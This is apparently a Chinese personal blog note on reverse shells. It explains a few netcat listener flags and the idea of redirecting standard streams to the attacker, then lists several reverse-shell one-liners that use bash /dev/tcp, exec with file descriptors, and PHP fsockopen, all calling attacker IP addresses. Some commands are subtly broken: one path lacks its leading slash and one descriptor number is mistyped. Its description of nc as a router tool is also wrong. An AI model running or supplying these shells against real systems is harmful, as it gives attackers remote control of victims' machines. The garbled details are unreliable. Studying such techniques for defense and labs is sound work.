沉铝汤的破站

IS LIFE ALWAYS THIS HARD, OR IS IT JUST WHEN YOU'RE A KID

反弹shell

nc命令

用于设置路由器

这里只讲几个参数

l:使用监听模式

v:显示指令执行过程

p:设置本地主机使用的端口

nc -lvp 233

bash -i

生成一个而可交互的bash

反弹shell的原理

这个师傅写的很好哦,连我这种菜狗都看得懂

文件描述符与重定向

反弹shell的本质

总之,就是把标准输入,输出,错误输出都定向到自己(攻击者)

一些常用的

bash -i >& dev/tcp/192.168...(hacker ip)/233(port) 0>&1

bash -i >& dev/tcp/192.168.19.1/233 <&2

exec 5<>/dev/tcp/192.168.146.129/2333;cat <&5|while read line;do $line >&5 2>&1;done

0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&1s96 >&196 2>&196

php -r '$sock=fsockopen("192.168.118.128",4444);exec("/bin/sh -i <&3 >&3 2>&3");'